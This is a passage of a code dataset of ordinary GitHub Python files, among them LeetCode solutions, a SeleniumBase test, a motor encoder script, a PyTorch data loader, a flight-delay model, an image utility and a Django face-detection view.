\"\"\"List comprehension\"\"\"\n my_list = [l for l in range(100000)]\n\n\n@measure_performance\ndef make_list3():\n \"\"\"Append\"\"\"\n my_list = []\n for item in range(100000):\n my_list.append(item)\n\n\n@measure_performance\ndef make_list4():\n \"\"\"Concatenation\"\"\"\n\n my_list = []\n for item in range(100000):\n my_list = my_list + [item]\n\n\nprint(make_list1())\nprint(make_list2())\nprint(make_list3())\nprint(make_list4())\n\n\nclass LimitQuery:\n def __init__(self, func):\n self.func = func\n self.count = 0\n\n def __call__(self, *args, **kwargs):\n self.limit = args[0]\n if self.count < self.limit:\n self.count += 1\n return self.func(*args, **kwargs)\n else:\n print(f'No queries left. 
All {self.count} queries used')\n return\n\n\n@LimitQuery\ndef get_coint_price(limit):\n \"\"\"\n View the bitcoin price index(BPI)\n \"\"\"\n\n url = requests.get('https://api.coindesk.com/v1/bpi/currentprice.json')\n\n if url.status_code == 200:\n text = url.json()\n return f\"${float(text['bpi']['USD']['rate_float']):.2f}\"\n\n\nprint(get_coint_price(5))\nprint(get_coint_price(5))\nprint(get_coint_price(5))\nprint(get_coint_price(5))\nprint(get_coint_price(5))\nprint(get_coint_price(5))\n\n# https://www.freecodecamp.org/news/python-decorators-explained-with-examples/\n","repo_name":"sonyjames9/python","sub_path":"code-practice/concepts/decorators_prac.py","file_name":"decorators_prac.py","file_ext":"py","file_size_in_byte":13940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14185138671","text":"'''\nRuntime: 4510 ms, faster than 5.23% of Python3 online submissions for My Calendar III.\nMemory Usage: 14.7 MB, less than 56.62% of Python3 online submissions for My Calendar III.\n'''\nfrom sortedcontainers import SortedDict\n\nclass MyCalendarThree:\n\n def __init__(self):\n self.diff = SortedDict()\n\n def book(self, start: int, end: int) -> int:\n self.diff[start] = self.diff.get(start, 0) + 1\n self.diff[end] = self.diff.get(end, 0) - 1\n cur = ans = 0\n for delta in self.diff.values():\n cur += delta\n ans = max(ans, cur)\n return ans\n\n# Your MyCalendarThree object will be instantiated and called as such:\n# obj = MyCalendarThree()\n# param_1 = obj.book(start,end)\n","repo_name":"lixiang2017/leetcode","sub_path":"problems/0732.0_My_Calendar_III.py","file_name":"0732.0_My_Calendar_III.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26946579220","text":"from seleniumbase import BaseCase\nimport time\n\n\nclass RecorderTests(BaseCase):\n def test_recording(self):\n self.open(\"https://test-moviltruck.azurewebsites.net/#/system/fast-booking\")\n \n self.click(\"mat-select#mat-select-1 div span span\")\n self.click(\"mat-option#mat-option-11 span\")\n self.click(\"mat-select#mat-select-2 div span span\")\n self.click(\"mat-option#mat-option-13 span\")\n #self.click('input[placeholder=\"Origen\"]')\n ButtonOrigen = '/html/body/app-root/body/app-header-geral/mat-drawer-container/mat-drawer-content/div/app-fast-booking/div/div[1]/div/div[3]/div/div/input'\n self.type(ButtonOrigen, \"Av. Nueva Granada, Caracas, Distrito Capital, Venezuela\")\n self.type('input[placeholder=\"Destino\"]', \"Av. Loira Arriba, Caracas 1020, Distrito Capital, Venezuela\")\n self.click('input[placeholder=\"No tenemos nada que mostrar\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('td[aria-label=\"12 de diciembre de 2022\"] span')\n self.click(\"app-fast-booking.ng-star-inserted div div:nth-of-type(6) button mat-icon\")\n time.sleep(6)\n","repo_name":"jormarsikiu/AutomatizacionUIMovilTruck","sub_path":"UI_test/recordings/busca1.py","file_name":"busca1.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73964613361","text":"#! 
/usr/bin/env python3\nimport threading\nfrom time import sleep\nfrom gpiozero import PhaseEnableMotor\nfrom gpiozero import DigitalInputDevice\n\nmotor = PhaseEnableMotor(16,12) # USED BROADCOM ADDRESSING\n\ndef encoders(motor):\n rot_enc1 = DigitalInputDevice(7)\n rot_enc2 = DigitalInputDevice(8)\n rot_enc3 = DigitalInputDevice(25)\n rot_enc4 = DigitalInputDevice(24)\n enc_1_ticks = 0\n enc_2_ticks = 0\n enc_3_ticks = 0\n enc_4_ticks = 0\n enc_1_value = 0\n enc_2_value = 0\n enc_3_value = 0\n enc_4_value = 0\n prev_tick_1 = 0\n prev_tick_2 = 0\n prev_tick_3 = 0\n prev_tick_4 = 0\n first_tick = True\n\n while encoder_start_flag.is_set() == True:\n while motor_moving_flag.is_set() == True:\n # This part of the code reads the changes in the encoder. \n # Im only using 1 pin instead of 2 pins per encoder to save on CPU usage\n # It should still give us 32*30 = 960 ticks per rotation of accuracy which equivalates\n # to(2*pi*25mm) / 960 ticks = 0.1636246mm per tick of precision. This means each tick is\n # a little over 0.16mm\n if first_tick == True: # first iteration\n first_tick = False \n prev_tick_1 = rot_enc1.value # reads GPIO pin 7\n prev_tick_2 = rot_enc2.value # reads GPIO pin 8\n prev_tick_3 = rot_enc3.value # reads GPIO pin 25\n prev_tick_4 = rot_enc4.value # reads GPIO pin 24\n if motor.value > 0: # makes sure motor is moving forward\n enc_1_ticks = enc_1_ticks + 1 # adds 1 to start always because there is no prev tick yet\n enc_2_ticks = enc_2_ticks + 1 # adds 1 to start always because there is no prev tick yet\n enc_3_ticks = enc_3_ticks + 1 # adds 1 to start always because there is no prev tick yet\n enc_4_ticks = enc_4_ticks + 1 # adds 1 to start always because there is no prev tick yet\n\n else: # every iteration after first\n # first encoder\n enc_1_value = rot_enc1.value # reads GPIO pin 7 for rotary encoder level\n if enc_1_value != prev_tick_1: # if the prev level and current are different(meaning it changed)\n if motor.value > 0: # moving forward\n enc_1_ticks = enc_1_ticks + 1 # increment ticks(forward)\n elif motor.value < 0: # moving backward\n enc_1_ticks = enc_1_ticks - 1 #decrement ticks(backward)\n else:\n print(\"Stopped!\")\n prev_tick_1 = enc_1_value # last value = current value\n # second encoder \n enc_2_value = rot_enc2.value # reads GPIO pin 8 for rotary encoder level\n if enc_2_value != prev_tick_2: # if the prev level and current are different(meaning it changed)\n if motor.value > 0: # moving forward\n enc_2_ticks = enc_2_ticks + 1 # increment ticks(forward)\n elif motor.value < 0: # moving backward\n enc_2_ticks = enc_2_ticks - 1 #decrement ticks(backward)\n else:\n print(\"Stopped!\")\n prev_tick_2 = enc_2_value # last value = current value\n '''\n # third encoder\n enc_3_value = rot_enc3.value # reads GPIO pin 25 for rotary encoder level\n if enc_3_value != prev_tick_3: # if the prev level and current are different(meaning it changed)\n if motor.value > 0: # moving forward\n enc_3_ticks = enc_3_ticks + 1 # increment ticks(forward)\n elif motor.value < 0: # moving backward\n enc_3_ticks = enc_3_ticks - 1 #decrement ticks(backward)\n else:\n print(\"Stopped!\")\n prev_tick_3 = enc_3_value # last value = current value\n\n # fourth encoder\n enc_4_value = rot_enc4.value # reads GPIO pin 24 for rotary encoder level\n if enc_4_value != prev_tick_4: # if the prev level and current are different(meaning it changed)\n if motor.value > 0: # moving forward\n enc_4_ticks = enc_4_ticks + 1 # increment ticks(forward)\n elif motor.value < 0: # moving backward\n 
enc_4_ticks = enc_4_ticks - 1 #decrement ticks(backward)\n else:\n print(\"Stopped!\")\n prev_tick_4 = enc_4_value # last value = current value\n '''\n print(\"Total counted encoder 1 ticks: \",enc_1_ticks)\n print(\"Total counted encoder 2 ticks: \",enc_2_ticks)\n #print(\"Total counted encoder 3 ticks: \",enc_3_ticks)\n #print(\"Total counted encoder 4 ticks: \",enc_4_ticks)\n print(\"Exiting Encoder Thread!\")\n\ndef main(motor):\n encoder_start_flag.set()\n motor.forward(0.1)\n motor_moving_flag.set()\n print(\"Motor started!\")\n sleep(4)\n motor.stop()\n motor_moving_flag.clear()\n encoder_start_flag.clear()\n \n\nif __name__ == \"__main__\":\n\n encoder_start_flag = threading.Event() # flag for encoder thread\n motor_moving_flag = threading.Event() #flag for encoder thread\n\n encoder_thread = threading.Thread(target=encoders,args=(motor,))\n main_thread = threading.Thread(target=main,args=(motor,))\n encoder_thread.start()\n main_thread.start()\n\n main_thread.join()\n encoder_thread.join()\n\n motor.stop()\n","repo_name":"Brett7047/pipe_robot","sub_path":"test_scripts/garbage.py","file_name":"garbage.py","file_ext":"py","file_size_in_byte":5656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19298632153","text":"import os\nimport numpy as np\nimport torch\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport data_loader\n\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n]\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\n\ndef make_dataset(dir):\n images = []\n dir = os.path.expanduser(dir)\n d = dir\n\n for root, _, fnames in sorted(os.walk(d)):\n for fname in sorted(fnames):\n if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n return images\n\n\nclass RGBDFolder(data.Dataset):\n\n def __init__(\n self,\n root,\n root_depth,\n transform_rgb=None,\n transform_depth=None,\n transform_mutual=None,\n loader_rgb=data_loader.pil_loader,\n loader_depth=data_loader.torch_tensor_loader\n ):\n imgs = make_dataset(root)\n if len(imgs) == 0:\n raise(\n RuntimeError(\n \"Found 0 images in subfolders of: \"+root+\"\\n\"\n \"Supported image extensions are: \"+\",\".join(IMG_EXTENSIONS)\n )\n )\n\n if not root_depth.endswith('/'):\n root_depth += '/'\n\n self.root = root\n self.root_depth = root_depth\n self.imgs = imgs\n\n self.transform_rgb = transform_rgb\n self.transform_depth = transform_depth\n self.transform_mutual = transform_mutual\n\n self.loader_rgb = loader_rgb\n self.loader_depth = loader_depth\n return\n\n def __getitem__(self, index=0):\n # load rgb images\n path_rgb = self.imgs[index]\n img = self.loader_rgb(path_rgb)\n\n # perform transforms on original rgb image\n if self.transform_rgb is not None:\n if self.transform_mutual is not None:\n img, img_disp = self.transform_rgb(img, self.transform_mutual)\n else:\n img_disp = torch.from_numpy(np.transpose(img, [2, 0, 1]))\n img = self.transform_rgb(img)\n\n # load depth map and perform transforms on it\n path_depth = self.root_depth\n path_depth += str(int(path_rgb[len(path_rgb)-9:len(path_rgb)-4]))\n path_depth += '.pth'\n depth = self.loader_depth(path_depth)\n if self.transform_depth is not None:\n if self.transform_mutual is not None:\n depth = self.transform_depth(depth, self.transform_mutual)\n else:\n depth = self.transform_depth(depth)\n\n return img, depth, img_disp\n\n def 
__len__(self):\n return len(self.imgs)\n","repo_name":"Allchen/FCRN-PyTorch","sub_path":"rgbd.py","file_name":"rgbd.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"32837789511","text":"import pandas as pd\nfrom datetime import datetime\nfrom typing import Tuple, Union, List\nimport numpy as np\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom joblib import dump, load\n\nfrom sklearn.metrics import confusion_matrix, classification_report\n\nclass DelayModel:\n\n def __init__(\n self\n ):\n self._model = None # Model should be saved in this attribute.\n self.top_10_features = [\n \"OPERA_Latin American Wings\",\n \"MES_7\",\n \"MES_10\",\n \"OPERA_Grupo LATAM\",\n \"MES_12\",\n \"TIPOVUELO_I\",\n \"MES_4\",\n \"MES_11\",\n \"OPERA_Sky Airline\",\n \"OPERA_Copa Air\"\n ]\n\n @staticmethod\n def _get_period_day(date: str) -> str:\n date_time = datetime.strptime(date, '%Y-%m-%d %H:%M:%S').time()\n morning_min = datetime.strptime(\"05:00\", '%H:%M').time()\n morning_max = datetime.strptime(\"11:59\", '%H:%M').time()\n afternoon_min = datetime.strptime(\"12:00\", '%H:%M').time()\n afternoon_max = datetime.strptime(\"18:59\", '%H:%M').time()\n evening_min = datetime.strptime(\"19:00\", '%H:%M').time()\n evening_max = datetime.strptime(\"23:59\", '%H:%M').time()\n night_min = datetime.strptime(\"00:00\", '%H:%M').time()\n night_max = datetime.strptime(\"4:59\", '%H:%M').time()\n\n if (date_time > morning_min and date_time < morning_max):\n return 'mañana'\n elif (date_time > afternoon_min and date_time < afternoon_max):\n return 'tarde'\n elif (\n (date_time > evening_min and date_time < evening_max) or\n (date_time > night_min and date_time < night_max)\n ):\n return 'noche'\n\n @staticmethod\n def _is_high_season(fecha: str) -> int:\n fecha_año = int(fecha.split('-')[0])\n fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')\n range1_min = datetime.strptime('15-Dec', '%d-%b').replace(year=fecha_año)\n range1_max = datetime.strptime('31-Dec', '%d-%b').replace(year=fecha_año)\n range2_min = datetime.strptime('1-Jan', '%d-%b').replace(year=fecha_año)\n range2_max = datetime.strptime('3-Mar', '%d-%b').replace(year=fecha_año)\n range3_min = datetime.strptime('15-Jul', '%d-%b').replace(year=fecha_año)\n range3_max = datetime.strptime('31-Jul', '%d-%b').replace(year=fecha_año)\n range4_min = datetime.strptime('11-Sep', '%d-%b').replace(year=fecha_año)\n range4_max = datetime.strptime('30-Sep', '%d-%b').replace(year=fecha_año)\n\n if ((fecha >= range1_min and fecha <= range1_max) or\n (fecha >= range2_min and fecha <= range2_max) or\n (fecha >= range3_min and fecha <= range3_max) or\n (fecha >= range4_min and fecha <= range4_max)):\n return 1\n else:\n return 0\n\n @staticmethod\n def _get_min_diff(row: pd.Series) -> float:\n fecha_o = datetime.strptime(row['Fecha-O'], '%Y-%m-%d %H:%M:%S')\n fecha_i = datetime.strptime(row['Fecha-I'], '%Y-%m-%d %H:%M:%S')\n min_diff = ((fecha_o - fecha_i).total_seconds()) / 60\n return min_diff\n\n def preprocess(\n self,\n data: pd.DataFrame,\n target_column: str = None\n ) -> Union[Tuple[pd.DataFrame, pd.DataFrame], pd.DataFrame]:\n \"\"\"\n Prepare raw data for training or predict\n\n Args:\n data (pd.DataFrame): raw data.\n target_column (str, optional): if set, the target is returned.\n\n Returns:\n Tuple[pd.DataFrame, pd.DataFrame]: features and target.\n or\n pd.DataFrame: features.\n 
\"\"\"\n data['period_day'] = data['Fecha-I'].apply(self._get_period_day)\n data['high_season'] = data['Fecha-I'].apply(self._is_high_season)\n data['min_diff'] = data.apply(self._get_min_diff, axis=1)\n threshold_in_minutes = 15\n data['delay'] = np.where(data['min_diff'] > threshold_in_minutes, 1, 0)\n\n features = pd.concat([\n pd.get_dummies(data['OPERA'], prefix='OPERA'),\n pd.get_dummies(data['TIPOVUELO'], prefix='TIPOVUELO'),\n pd.get_dummies(data['MES'], prefix='MES')\n ], axis=1)\n\n if target_column:\n target = pd.DataFrame(data[target_column])\n\n return features[self.top_10_features], target\n\n for col in self.top_10_features:\n if col not in features.columns:\n features[col] = 0\n features = features[self.top_10_features]\n\n return features[self.top_10_features]\n\n def fit(\n self,\n features: pd.DataFrame,\n target: pd.DataFrame\n ) -> None:\n \"\"\"\n Fit model with preprocessed data.\n\n Args:\n features (pd.DataFrame): preprocessed data.\n target (pd.DataFrame): target.\n \"\"\"\n\n x_train, x_test, y_train, y_test = train_test_split(\n features,\n target['delay'],\n test_size=0.33,\n random_state=42,\n shuffle=True\n )\n\n # Get weights for the classes\n n_y0 = len(y_train[y_train == 0])\n n_y1 = len(y_train[y_train == 1])\n\n # Train logistic regression model\n self._model = LogisticRegression(\n class_weight={1: n_y0 / len(y_train), 0: n_y1 / len(y_train)}\n )\n self._model.fit(x_train, y_train.values.ravel())\n\n result = self._model.predict(x_test)\n print(confusion_matrix(y_test, result))\n\n dump(self._model, 'logistic_regression_model.joblib')\n\n\n def predict(\n self,\n features: pd.DataFrame\n ) -> List[int]:\n \"\"\"\n Predict delays for new flights.\n\n Args:\n features (pd.DataFrame): preprocessed data.\n \n Returns:\n (List[int]): predicted targets.\n \"\"\"\n if self._model is None:\n current_dir = os.path.dirname(os.path.abspath(__file__))\n data_path = os.path.join(current_dir, 'logistic_regression_model.joblib')\n self._model = load(data_path)\n\n x_to_predict = features[self.top_10_features]\n predictions = self._model.predict(x_to_predict)\n\n return predictions.tolist()\n","repo_name":"afescobar94/latam","sub_path":"challenge/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1319420125","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nfrom collections import deque\n\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n A = []\n if not root: return A\n \n D = deque([root])\n \n while len(D):\n L = []\n for _ in range(len(D)):\n node = D.popleft()\n L.append(node.val)\n if node.left: D.append(node.left)\n if node.right: D.append(node.right)\n A.append(L)\n return A \n \n \n ","repo_name":"sbeignez/LeetCode","sub_path":"binary-tree-level-order-traversal/binary-tree-level-order-traversal.py","file_name":"binary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25634843839","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().system('pip install opencv-python')\nimport cv2\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\npath = 
os.getcwd()\n#print(path)\nfilepath = path+r\"\\Pictures\\anime-faces\\data\"\nprint(filepath)\n\ntest = cv2.imread(filepath+r'\\1.png') \n\n\n# In[3]:\n\n\n#test\n\n\n# In[4]:\n\n\ndata = []\nfor i in range(21551):\n data.append(cv2.imread(filepath + r'\\%s.png'%(i+1)))\n\n\n# In[8]:\n\n\nplt.imshow(data[0][:,:,::-1])\n\n\n# In[ ]:\n\n\ndata = np.array(data)\n\n\n# In[ ]:\n\n\ndata.shape\n\n\n# In[ ]:\n\n\nnp.save('hw2_2',data)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"yuping1624/1082NCTU-Deep-Learning","sub_path":"Homework2/HW2-2_0852617_曾鈺評_preprocessing.py","file_name":"HW2-2_0852617_曾鈺評_preprocessing.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4954056581","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import auc, make_scorer, plot_confusion_matrix, plot_roc_curve, roc_auc_score\nfrom sklearn.model_selection import cross_validate, StratifiedKFold, StratifiedShuffleSplit\n\nfrom datareader import get_credit_card_xy, get_dataset_train_test, get_heart_xy, RANDOM_STATE, save_figure\nfrom trainer import TRAIN_SIZE\n\n\ndef plot_clf_confusion_mat(clf, x_test, y_test, clf_name, dataset_name, labels):\n print(\"\\tGenerating Confusion matrix...\")\n fig, ax = plt.subplots()\n plot_confusion_matrix(clf,\n x_test,\n y_test,\n display_labels=labels,\n normalize=\"true\",\n ax=ax,\n cmap=plt.get_cmap(\"Blues\"))\n\n save_figure(fig, clf_name, dataset_name, \"confusion_matrix\")\n\n\ndef plot_cross_val_roc_curves(clf, x, y, clf_name, dataset_name):\n print(\"\\tGenerating AUC_ROC curves over cross validation...\")\n cv = StratifiedKFold(n_splits=6)\n\n tprs = []\n aucs = []\n mean_fpr = np.linspace(0, 1, 100)\n\n fig, ax = plt.subplots()\n for i, (train, test) in enumerate(cv.split(x, y)):\n clf.fit(x[train], y[train])\n viz = plot_roc_curve(clf, x[test], y[test],\n name='ROC fold {}'.format(i),\n alpha=0.3, lw=1, ax=ax)\n interp_tpr = np.interp(mean_fpr, viz.fpr, viz.tpr)\n interp_tpr[0] = 0.0\n tprs.append(interp_tpr)\n aucs.append(viz.roc_auc)\n\n ax.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r', alpha=.8)\n\n mean_tpr = np.mean(tprs, axis=0)\n mean_tpr[-1] = 1.0\n mean_auc = auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n ax.plot(mean_fpr, mean_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n lw=2, alpha=.8)\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n ax.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. 
dev.')\n\n ax.set(xlim=[-0.05, 1.05], ylim=[-0.05, 1.05])\n ax.legend(loc=\"lower right\")\n\n save_figure(fig, clf_name, dataset_name, \"roc_auc_cv\")\n\n\ndef cross_validate_and_analyze(clf,\n x_train,\n x_test,\n y_train,\n y_test,\n clf_name,\n dataset_name,\n labels,\n scoring=make_scorer(roc_auc_score)):\n plot_cross_val_roc_curves(clf, x_train, y_train, clf_name, dataset_name)\n\n train_scores = cross_validate(\n clf,\n x_train,\n y_train,\n scoring=scoring,\n n_jobs=-1,\n return_train_score=True,\n return_estimator=True)\n best_clf = train_scores['estimator'][train_scores['test_score'].argmax()]\n\n plot_clf_confusion_mat(best_clf,\n x_test,\n y_test,\n clf_name=clf_name,\n dataset_name=dataset_name,\n labels=labels)\n\n\ndef plot_performance_vs_train_size(dataset_name,\n clf_name,\n clf,\n data_preprocessor=None,\n scoring=make_scorer(roc_auc_score),\n train_max=0.9):\n print(\"\\tPerformance VS Train Size...\")\n if dataset_name == \"heart\":\n x, y = get_heart_xy(data_preprocessor)\n elif dataset_name == \"credit_card\":\n x, y = get_credit_card_xy(data_preprocessor)\n else:\n assert False\n\n fig, ax = plt.subplots()\n\n train_scores = []\n test_scores = []\n steps = 10\n a_min = 0.1\n step_size = (train_max - a_min) / steps\n train_sizes = np.arange(a_min, train_max, step_size)\n for train_size in train_sizes:\n print(\"\\t\\tTrain size: {}\".format(train_size, ))\n ss = StratifiedShuffleSplit(train_size=train_size,\n n_splits=15,\n random_state=RANDOM_STATE)\n scores = cross_validate(\n clf,\n x,\n y,\n scoring=scoring,\n cv=ss.split(x, y),\n n_jobs=-1,\n return_train_score=True,\n return_estimator=False)\n\n avg_train = np.mean(scores[\"train_score\"])\n train_scores.append(avg_train)\n avg_test = np.mean(scores[\"test_score\"])\n test_scores.append(avg_test)\n\n ax.plot(train_sizes, train_scores, lw=2, color='b', label=\"train scores\")\n ax.plot(train_sizes, test_scores, lw=2, color='r', label=\"test scores\")\n\n ax.legend(loc=\"lower right\")\n\n save_figure(fig, clf_name, dataset_name, \"score_vs_train_size\")\n\n\ndef analyze_clf(dataset_name,\n clf_name,\n labels,\n clf,\n train_size=TRAIN_SIZE,\n data_preprocessor=None,\n train_max=0.9):\n\n plot_performance_vs_train_size(dataset_name,\n clf_name,\n clf,\n data_preprocessor,\n train_max=train_max)\n\n x_train, x_test, y_train, y_test = get_dataset_train_test(dataset_name,\n train_size=train_size,\n random_state=RANDOM_STATE,\n data_preprocessor=data_preprocessor)\n cross_validate_and_analyze(\n clf,\n x_train,\n x_test,\n y_train,\n y_test,\n clf_name=clf_name,\n dataset_name=dataset_name,\n labels=labels,\n scoring=make_scorer(roc_auc_score)\n )\n","repo_name":"macnb9/p1_supervised_learning","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14184218691","text":"'''\nBFS\n\nRuntime: 213 ms, faster than 14.19% of Python3 online submissions for Word Ladder II.\nMemory Usage: 14.6 MB, less than 71.47% of Python3 online submissions for Word Ladder II.\n\n2022-08-14 测试用例增强了, 现在会 TLE\n'''\nclass Solution:\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n word_set = set()\n for word in wordList:\n word_set.add(word)\n if endWord not in word_set:\n return []\n \n q = deque([ [beginWord, [beginWord]] ]) \n l = len(beginWord)\n seen = set([beginWord])\n while q:\n next_q = deque()\n ans = []\n visited = seen.copy()\n for word, arr 
in q:\n for i in range(l):\n for low in string.ascii_lowercase:\n com = word[: i] + low + word[i + 1: ]\n if com in word_set:\n if com == endWord:\n ans.append(arr + [com])\n else:\n if com not in visited:\n next_q.append([com, arr + [com]])\n seen.add(com)\n if ans:\n return ans\n else:\n q = next_q\n\n return [] \n\n\n\n'''\n先使用 BFS 找到最短路径的长度,再使用 DFS + memo 寻找路径。\n\nRuntime: 246 ms, faster than 20.77% of Python3 online submissions for Word Ladder II.\nMemory Usage: 18.8 MB, less than 6.57% of Python3 online submissions for Word Ladder II.\n'''\nclass Solution:\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n words = set(wordList)\n if endWord not in words:\n return []\n\n graph = defaultdict(list)\n for w in wordList:\n for i in range(len(w)):\n key = w[: i] + '?' + w[i + 1: ]\n graph[key].append(w)\n\n def depth() -> int:\n d = 0\n seen = {beginWord}\n q = deque([beginWord])\n while q:\n for _ in range(len(q)):\n w = q.popleft()\n for i in range(len(w)):\n key = w[: i] + '?' + w[i + 1: ]\n for neigh in graph[key]:\n if neigh == endWord:\n return d + 1\n if neigh not in seen:\n seen.add(neigh)\n q.append(neigh)\n d += 1\n return -1\n\n d = depth()\n if -1 == d:\n return []\n\n @lru_cache(None)\n def walk(word, d):\n if 0 == d:\n if word == endWord:\n return [[endWord]]\n return []\n\n result = []\n for i in range(len(word)):\n key = word[: i] + '?' + word[i + 1: ]\n for neigh in graph[key]:\n paths = walk(neigh, d - 1)\n result += [[word] + path for path in paths]\n return result \n\n return walk(beginWord, d)\n\n\n","repo_name":"lixiang2017/leetcode","sub_path":"problems/0126.0_Word_Ladder_II.py","file_name":"0126.0_Word_Ladder_II.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3326797573","text":"import requests\nfrom flask import send_file\nfrom PIL import Image\nimport os\n\n\ndef download_image(url, file_path):\n # Send a GET request to the specified URL and save the image to the file path\n response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'}, stream=True)\n \n if response.status_code == 200:\n with open(file_path, 'wb') as file:\n for chunk in response.iter_content(chunk_size=1024):\n if chunk:\n file.write(chunk)\n else:\n raise Exception('Failed to fetch the image')\n\n\ndef get_file_response(file_path):\n # Return the file as a Flask send_file response if it exists\n if os.path.exists(file_path):\n return send_file(file_path, mimetype='image/jpeg')\n return None\n\n\ndef resize_image(original_path, resized_path, width, height):\n # Open the original image, resize it, and save the resized image to the specified path\n with Image.open(original_path) as image:\n resized_image = image.resize((width, height))\n resized_image.save(resized_path, \"JPEG\")\n","repo_name":"cookin404/image-proxy-server","sub_path":"Utils/image_utils.py","file_name":"image_utils.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31288389930","text":"\"\"\"Installation script for the 'isaacgymenvs' python package.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom setuptools import setup, find_packages\n\nimport os\n\nroot_dir = 
os.path.dirname(os.path.realpath(__file__))\n\n\n# Minimum dependencies required prior to installation\nINSTALL_REQUIRES = [\n # RL\n \"gym\",\n \"torch\",\n \"matplotlib==3.5.1\",\n \"tb-nightly\",\n \"tqdm\",\n \"ipdb\",\n # \"sklearn\",\n # \"tensorboardX\",\n # meta\n \"dowel\",\n \"akro\"\n]\n\n# Installation operation\nsetup(\n name=\"seqdex\",\n author=\"\",\n version=\"0.1.0\",\n description=\"Chaining Dexterous Policies for Long-Horizon Manipulation.\",\n keywords=[\"robotics\", \"rl\"],\n include_package_data=True,\n install_requires=INSTALL_REQUIRES,\n packages=find_packages(\".\"),\n classifiers=[\"Natural Language :: English\", \"Programming Language :: Python :: 3.7\"],\n zip_safe=False,\n)\n\n# EOF\n","repo_name":"Skeli9989/SeqDex","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"2690504904","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\n\nfrom .utils import *\nimport base64\nimport time\n# Create your views here.\n\n\ndef IndexView(request):\n\n return render(request, \"portal/index.html\")\n\ndef FaceDetectionView(request):\n \n epoch = str(time.time())\n if request.method != \"POST\":\n return HttpResponse(\"Only POST Requests Accepted\")\n\n if \"image\" in request.POST:\n with open(\"temp/%s.png\"%(epoch), \"wb\") as fh:\n img = request.POST.get('image')\n \n missing_padding = len(img) % 4\n if missing_padding != 0:\n img += '='* (4 - missing_padding)\n \n fh.write(base64.b64decode(img))\n\n f = FaceRecogniser()\n if not f:\n return HttpResponse(\"Error!\")\n \n face = f.detect_face(f.process_image(\"temp/%s.png\"%epoch))\n\n if face == -1 or face == -2:\n return JsonResponse({\"status\": False, \"msg\": \"No/Multiple Face Datected!\"})\n \n return JsonResponse({\"status\": True})\n","repo_name":"aakankshax/stacksfx","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70464573684","text":"import os\nimport os.path as op\nimport 